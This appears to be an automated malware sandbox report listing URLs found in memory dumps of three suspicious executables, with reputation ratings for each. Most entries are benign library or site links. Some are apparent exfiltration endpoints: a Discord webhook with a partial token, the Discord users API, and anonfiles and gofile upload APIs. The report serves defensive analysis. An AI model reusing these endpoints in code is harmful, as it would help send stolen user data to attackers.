                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/urllib3/urllib3/issues/2920based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17based.exe, 00000008.00000003.2259259730.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.leboncoin.fr/based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://yahoo.com/based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://tools.ietf.org/html/rfc2388#section-4.4based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://account.bellmedia.cbased.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://weibo.com/based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.anonfiles.com/uploadbased.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.gofile.io/getServerr;rbased.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://login.microsoftonline.combased.exe, 00000008.00000002.2383767795.00000273EE52C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://cacerts.digicert.cohacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.thawte.com/ThawteTimestampingCA.crl0based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://html.spec.whatwg.org/multipage/based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsbased.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.zhihu.com/based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installbased.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbased.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.msn.combased.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.rfc-editor.org/rfc/rfc8259#section-8.1based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngzbased.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://discord.com/api/v9/users/based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.iana.org/time-zones/repository/tz-link.htmlbased.exe, 00000008.00000003.1753993526.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.amazon.ca/based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.gofile.io/getServerbased.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://json.orgbased.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxybased.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220B58000.00000004.00001000.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748492866.000001A051C7C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://sectigo.com/CPS0based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icobased.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.amazon.co.uk/based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ocsp.thawte.com0based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerVaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.amazon.com/based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.gofile.io/getServerr;based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://httpbin.org/based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.python.org/dev/peps/pep-0205/VaTlw2kNGc.exe, 00000000.00000003.1701929834.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726830017.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1729314570.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sbased.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlbased.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016based.exe, 00000008.00000003.2258916763.00000273ED8FD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.wykop.pl/based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://twitter.com/based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.ecosia.org/newtab/based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brbased.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.olx.pl/based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.org/products/firefoxbased.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://cacerts.digicert.coHhacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syVaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://MD8.mozilla.org/1/mbased.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://google.com/based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://google.com/mail/based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/urllib3/urllib3/issues/2920Sbased.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://google.com/mail/based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bugzilla.mobased.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tools.ietf.org/html/rfc6125#section-6.4.3based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.amazon.fr/based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://raw.gitbased.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngbased.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/complete/based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
